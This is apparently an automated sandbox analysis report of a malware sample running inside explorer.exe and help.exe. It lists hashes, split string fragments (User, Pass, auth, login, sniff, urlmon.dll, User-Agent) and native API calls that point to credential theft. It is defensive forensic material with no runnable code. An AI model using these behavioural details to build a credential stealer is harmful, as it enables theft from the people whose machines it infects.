Instruction Fuzzy Hash: 80A1BF706187488FDB29EFA8D4447EEB7E1FF88314F00562DE58ADB291EF30A5458789

Uniqueness

Uniqueness Score: -1.00%

Function 0DEAECE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

word, xrefs: 0DEAED9E
L: , xrefs: 0DEAED66
UR, xrefs: 0DEAED5F
2, xrefs: 0DEAEDE1
Pass, xrefs: 0DEAED97
name, xrefs: 0DEAEDB2
User, xrefs: 0DEAEDAB

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 991bf34b05f575879fb04cdf681c3ef7b63c296116614313c5cb0e2cf6cf7064
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 9591BE306187488FDB28EFA8D444BEEB7E1FF88314F00562EE58ADB251EF7095458789

Uniqueness

Uniqueness Score: -1.00%

Function 0DEAE352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

e, xrefs: 0DEAE48E
n, xrefs: 0DEAE3E7
v, xrefs: 0DEAE4A0
., xrefs: 0DEAE3B0
, xrefs: 0DEAE47C

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 8df45b4fc9ea1481625137d837e9e203ebff090433190b65004fa7bd9a497b65
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: A77182316187498FD758EFA8D4886EAB7F1FF58304F00162EE44ADB261EF71E9458B81

Uniqueness

Uniqueness Score: -1.00%

Function 0DEA9C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

dll, xrefs: 0DEA9C9E
l32., xrefs: 0DEA9C97
2.dl, xrefs: 0DEA9C64
shel, xrefs: 0DEA9C90
ole3, xrefs: 0DEA9C5D

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: f19e0e71e26402624988354857b830e12488e64a5701fa6512269ff0a44692de
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 14514CB0918B4D8FDB64EFA4C044AEEB7F1FF58300F41562E959AE7254EF30A5418B89

Uniqueness

Uniqueness Score: -1.00%

Function 0DEAA86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

dll, xrefs: 0DEAA8F4
\, xrefs: 0DEAA9E0
vers, xrefs: 0DEAA8E4
4, xrefs: 0DEAA9E9
ion., xrefs: 0DEAA8EC

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: c3c57cd72a2da5119088b83265c86406ea90737fde6a0fd149b63b3f9bed2662
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 60416F30218B898BCB75EF2898457EBB3E4FB98315F41562E994ECB240EF30E505C782

Uniqueness

Uniqueness Score: -1.00%

Function 0DEAC4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

32.d, xrefs: 0DEAC4DA
sspi, xrefs: 0DEAC50E
cli., xrefs: 0DEAC515
user, xrefs: 0DEAC4D3
dll, xrefs: 0DEAC51C

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 6d9695c06749f99525b1db45955c8602ad58cdc6364bdb46b63ad525725da7de
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: DC416F34A18E0D8FCB58EF5880957AE77E1FF68304F51516AA80AEB210DE70E5408BC6

Uniqueness

Uniqueness Score: -1.00%

Function 0DEAA432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

kern, xrefs: 0DEAA52A
h, xrefs: 0DEAA51F
.dll, xrefs: 0DEAA53F
el32, xrefs: 0DEAA537

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: e77d230728a59fc53a6f231abff5da43e924165f5be3b01337f59847fb91c93f
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 6A418C70608B498FD769DF2CC0883BAB7E1FB98305F105A3E959AC6255DF70D845CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0DEB10B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

, xrefs: 0DEB1184
om:, xrefs: 0DEB1146
f fr, xrefs: 0DEB113D
Snif, xrefs: 0DEB1154

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: f05c54302533e9c8ccd62f3f5223051f13a01bd63e4bdb1060373d7dd49cd2bd
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 7B31BE7150DB886FD72AEB68C4846EBB7D4FB84310F50591EE49BC7252EE30E54ACB42

Uniqueness

Uniqueness Score: -1.00%

Function 0DEB10C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

, xrefs: 0DEB1184
om:, xrefs: 0DEB1146
f fr, xrefs: 0DEB113D
Snif, xrefs: 0DEB1154

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 178593e00ed626d045ac2bf0febcd5be61d033e78888b6e13689e117029deeb8
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 4631CE7150CB486FD72AEB28C484AEBB7D5FB94310F50591EE49BD7251EE30F50ACA42

Uniqueness

Uniqueness Score: -1.00%

Function 0DEACFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

.dll, xrefs: 0DEACFFE
me_c, xrefs: 0DEACFEE
hild, xrefs: 0DEACFF6
chro, xrefs: 0DEAD023

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: d5e6577f07459109d9fda22edf412f0fce57a4668ef875e67e873b8018e5a346
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: A6319C30118B584FCB84EF288494BABB7E1FF98210F85662D954ECB215DF30E505CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0DEACFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

.dll, xrefs: 0DEACFFE
me_c, xrefs: 0DEACFEE
hild, xrefs: 0DEACFF6
chro, xrefs: 0DEAD023

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 2e2201a2b0f040313b348f82b7a17d303818fd385d01cd61ffb1ae36f494e707
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 98317A30218B598FCB94EF288894BABB7E1FF98210F95662D954ECB255DF30E5058B42

Uniqueness

Uniqueness Score: -1.00%

Function 0DEAF8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

nt: , xrefs: 0DEAF91E
urlmon.dll, xrefs: 0DEAF959
User-Agent: , xrefs: 0DEAF935, 0DEAF948
on.d, xrefs: 0DEAF902

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 86146144e268b44d87ab3fca824283b7e68c3c0db6c0fddac839d2c99a06bbe9
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 1731CE31614A4D8BCF15EFA8C8847EEB7E1FF58214F41122AE54EEB240DE7896458789

Uniqueness

Uniqueness Score: -1.00%

Function 0DEAF8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

nt: , xrefs: 0DEAF91E
urlmon.dll, xrefs: 0DEAF959
User-Agent: , xrefs: 0DEAF935, 0DEAF948
on.d, xrefs: 0DEAF902

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: a4e570bc2c2109a864ef3cf9f3da6b10e54dd9469ba9fcc4c9e148de982a77ab
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 3C21E130614A4D8ACF15EFA8C8847EEBBA1FF58214F41122AE55AEB240DE74D6058789

Uniqueness

Uniqueness Score: -1.00%

Function 0DEB0E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0DEB0F03
l, xrefs: 0DEB0F26
., xrefs: 0DEB0F1F
t, xrefs: 0DEB0EF4

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 7ce46c2da575459c5bf2ce714e5542196c402977f55fabbe2047687a85292e85
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 7A217A70A28A0E9BDB48EFA8D0447EEBAF0FF18314F50562ED109E7610DB74E5918B84

Uniqueness

Uniqueness Score: -1.00%

Function 0DEB0E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0DEB0F03
l, xrefs: 0DEB0F26
., xrefs: 0DEB0F1F
t, xrefs: 0DEB0EF4

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 9b2c5ec8af6fcf7670c8078ccac2f17d1e469d0fabef7661d803cab3fb22fa2e
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 74218B70A28A0E9BDB08EFA8D0447EEBBF0FF18314F50562ED109E7600DB74E5518B84

Uniqueness

Uniqueness Score: -1.00%

Function 0DEB0FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

logi, xrefs: 0DEB103C
user, xrefs: 0DEB1015
pass, xrefs: 0DEB1022
auth, xrefs: 0DEB102F

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 5de8dd0df05d679268bf6206b3aeedffe2e9e747d6c6ffc512a78a9894f141e4
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 1021AE30618B0D8BCB05DF9998907EEB7E1FF88364F00561DD44AEB244DBB0E9148BC2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: help.exePID: 1068, Parent PID: 3320COMMON

Execution Graph

Execution Coverage:	5.1%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	591
Total number of Limit Nodes:	69

Executed Functions

Function 02DDA34A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02DD4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DD4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02DDA39D

Strings

.z`, xrefs: 02DDA38D, 02DDA398

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 8b0c0c5ca0e5a5b6ea08b53fb9bbadba6cb2369c8a790a142ee15d1bcbcd67ad
Instruction ID: db6fa998e59bcf84e17f3930cc6b0e9ed104eba13129e6bf6a810fedcc43dc9e
Opcode Fuzzy Hash: 8b0c0c5ca0e5a5b6ea08b53fb9bbadba6cb2369c8a790a142ee15d1bcbcd67ad
Instruction Fuzzy Hash: 1001AFB2605508AFDB08CF98DC94EEB77A9EF8C354F158648FA1D97240C630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DDA350 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02DD4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DD4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02DDA39D

Strings

.z`, xrefs: 02DDA38D, 02DDA398

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 2c50c97cbb0b3dde793002e338fb2e33102be5b0b7b63f39d8f18b22e3718b19
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 16F0BDB2204208AFCB08CF88DC84EEB77ADEF8C754F158248BA1D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DDA400 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02DD4D62,5EB65239,FFFFFFFF,02DD4A21,?,?,02DD4D62,?,02DD4A21,FFFFFFFF,5EB65239,02DD4D62,?,00000000), ref: 02DDA445

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: ec6019c6f30e5a37cbc3bc62dd2908b01c8a3aed144c3ae80d1dd795c79c090f
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 1BF0A4B2200208AFCB14DF99DC80EEB77ADEF8C754F158248BA1D97245D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DDA44A Relevance: 1.5, APIs: 1, Instructions: 35filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02DD4D62,5EB65239,FFFFFFFF,02DD4A21,?,?,02DD4D62,?,02DD4A21,FFFFFFFF,5EB65239,02DD4D62,?,00000000), ref: 02DDA445

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 55a79bdb976a11c3214ab91ef7d89e21b4b1d58aa6fa3a6f7cccc4e8f4176b91
Instruction ID: e06af33e3885ad2bb786cc13db3b0f4d52158669ce39c30e9306e5c91021452a
Opcode Fuzzy Hash: 55a79bdb976a11c3214ab91ef7d89e21b4b1d58aa6fa3a6f7cccc4e8f4176b91
Instruction Fuzzy Hash: 6BF01CB62442146BD714EFE8DC94EA7B3ACEF88760F048959FA1C97240C631E9008BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DDA530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02DC2D11,00002000,00003000,00000004), ref: 02DDA569

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 6055a02be76f8a7f566ef914ce43f944e765972fe5dbbff08981c12b2a6216b4
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 4EF015B2200208AFCB14DF89CC80EAB77ADEF88754F118148BE1C97241C630F810CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 02DDA47A Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02DD4D40,?,?,02DD4D40,00000000,FFFFFFFF), ref: 02DDA4A5

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 2a98dc02b48be07a07646dee86cc3133fc265054867ee8f8186be0c59e86bd69
Instruction ID: 3a3822b72e50edc43939177cf6aaf111c98c0be02653daaade3b0921ed0fd772
Opcode Fuzzy Hash: 2a98dc02b48be07a07646dee86cc3133fc265054867ee8f8186be0c59e86bd69
Instruction Fuzzy Hash: 2EE086762005146FD710DFB8CC85EE77B65EF44350F154195FA5D9B341C530A505CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 02DDA480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02DD4D40,?,?,02DD4D40,00000000,FFFFFFFF), ref: 02DDA4A5

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 218f35d45b002470ed21a263e97400288f2480b91c9751753c15f791706b902a
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 7ED012762002146BD710EB98CC45E97775DEF44750F154495BA1C5B241C530F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 03809780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0380978A

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fe7ce575183fc596203c0dd70b1905f1b1d9b074f1bccaaf9aa518d7cf16732b
Instruction ID: 1bc060fa0c64f0542d151c8b5f8ee5b4dc343904ca5f4ba02577e5504774e7c4
Opcode Fuzzy Hash: fe7ce575183fc596203c0dd70b1905f1b1d9b074f1bccaaf9aa518d7cf16732b
Instruction Fuzzy Hash: B490026921305402D180B1995408B1A040997D1242F91D855A1009668CCA55887D6361

Uniqueness

Uniqueness Score: -1.00%

Function 03809FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03809FEA

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bb5842b683d8a6c7a622e55436e0c12adaadfdf30ce1713a0f5c852782daab2b
Instruction ID: d799bc0c470dc0b9f88d801a89b0d4ce5c9f1c55982e2471a411198bb596e879
Opcode Fuzzy Hash: bb5842b683d8a6c7a622e55436e0c12adaadfdf30ce1713a0f5c852782daab2b
Instruction Fuzzy Hash: 8890027131119802D110A1998404B16040997D1241F51C851A1818668D87D588A97162

Uniqueness

Uniqueness Score: -1.00%

Function 03809710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0380971A

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 70693134a63729e8e80c6d2edb7de56566c85404073b44e39e858a42f6d157f2
Instruction ID: cb538d5faaf988a477ea7407a519ab04c876ebdf382ebaff2fd04f6083780985
Opcode Fuzzy Hash: 70693134a63729e8e80c6d2edb7de56566c85404073b44e39e858a42f6d157f2
Instruction Fuzzy Hash: B990027120105802D100A5D95408B56040997E0341F51D451A6018665EC7A588A97171

Uniqueness

Uniqueness Score: -1.00%

Function 038096D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038096DA

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9f28d9388defb32feb957cafd1fd3d9fecc4903665ca2e5b9b1969d0a3da39ba
Instruction ID: 2ba1b55396f415f28f5be31a96ca0ac624a6a8ecd62e75173e0a21340d5c5a01
Opcode Fuzzy Hash: 9f28d9388defb32feb957cafd1fd3d9fecc4903665ca2e5b9b1969d0a3da39ba
Instruction Fuzzy Hash: A790027120105C42D100A1994404F56040997E0341F51C456A1118764D8755C8697561

Uniqueness

Uniqueness Score: -1.00%

Function 038096E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038096EA

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 625b28c6c1e46047459aa513af53b2fb6e02e635fd1335a363099d15582b79d1
Instruction ID: b4229797b5e071ee9265592bbec89b5c42883025ad061f727ff4cfe558fda0d1
Opcode Fuzzy Hash: 625b28c6c1e46047459aa513af53b2fb6e02e635fd1335a363099d15582b79d1
Instruction Fuzzy Hash: 019002712010DC02D110A1998404B5A040997D0341F55C851A5418768D87D588A97161

Uniqueness

Uniqueness Score: -1.00%

